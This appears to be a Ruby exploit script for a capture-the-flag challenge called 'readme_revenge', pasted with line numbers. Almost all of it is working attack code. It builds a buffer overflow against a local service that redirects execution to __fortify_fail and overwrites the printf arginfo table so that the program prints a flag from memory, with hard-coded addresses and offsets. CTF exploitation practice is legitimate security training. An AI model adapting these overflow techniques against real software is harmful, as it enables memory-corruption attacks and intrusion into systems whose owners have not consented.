# encoding: ASCII-8BIT# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./readme_reve

1. # encoding: ASCII-8BIT
2. # socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./readme_revenge
3. # ruby pwn.rb
4.  
5. require 'pwn'
6.  
7. context.arch = 'amd64'
8. context.log_level = :debug
9.  
10. z = Sock.new 'localhost', 2323
11.  
12. # shellcode = p8(0x90) * 8
13.  
14. payload = ""
15. payload += 'A' * 1000
16. # payload += cyclic 112
17. # payload += shellcode
18. # payload += 'A' * (1000 - 112 - shellcode.length)
19. payload += p64 0x4359d0 # address to jump to, __fortify_fail
20.  
21. flag_addr = 0x6b73e0 + 1000 + 8 + 432 + 8
22.  
23. # Only needed to trigger redirection, most of this
24. # could be anywhere in the buffer we send
25. payload += 'B' * 432
26. payload += p64 flag_addr # pointer to char*
27. payload += p64 0x6b4040 # flag
28. payload += 'C' * (608 - 432 - 16)
29. payload += p64(0) # offset 1000 + 8 + 608 must be 0, else segfault
30. payload += 'D' * 112
31. payload += p64 0x6b7430 # printf arginfo table
32. #payload += cyclic 1000
33.  
34. z.send payload
35.  
36. # This works but the program crashes after printing the flag ¯\_(ツ)_/¯
37.  
38. # z.send(cyclic(1000) + p64(0x6b7450) + 'A' * 608 + p64(0) + cyclic(112) + p64(0x6b7430))